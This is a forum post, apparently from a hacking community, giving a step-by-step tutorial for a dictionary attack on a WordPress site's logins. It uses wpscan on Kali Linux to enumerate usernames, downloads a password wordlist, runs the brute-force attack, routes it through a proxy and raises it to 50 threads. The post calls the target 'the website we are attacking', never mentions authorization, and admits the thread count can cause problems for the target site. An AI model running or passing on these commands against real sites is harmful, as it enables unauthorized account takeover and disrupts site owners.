WordPress Dictionary Attack


zero

Administrator
Staff member
Administrator
Boot up your Kali Linux distro and let's get started. Alright - all opened up. We want to run a wpscan on the website we are attacking while also using the "--enumerate u" toggle to find usernames. It might also find some XSS or other vulns known so pay attention to those too.

  • wpscan --url website.com --enumerate u


  • Our output should look like this - we can see 3 usernames we can try attack.

  • Before we start our attack, let's get a dictionary to attack it with. Here's a pretty decent one with common wordpress passwords
    wget https://www.wpwhitesecurity.com/downloads/wpw_pwd_dictionary.zip
    >wget is the command we can use to get that file from a direct download link.
  • Then we need to unzip it
  • unzip wpw_pwd_dictionary.zip
  • We also need to create our username list file so we can do this:
  • nano usernames.txt
  • We type in
    wpscan --url website.com -P wpw_pwd_dictionaryt.txt -U usernames.txt


  • You can add on proxies by using the toggle or http proxies by changing socks5 to http/https or whatever you are after.
    --proxy socks5://127.0.0.1:9000
  • You can also choose how many threads the program will use which can cause more issues with the target site but will be faster - an example to our command would be:
    wpscan --url website.com -P wpw_pwd_dictionaryt.txt -U usernames.txt --threads 50
 

Top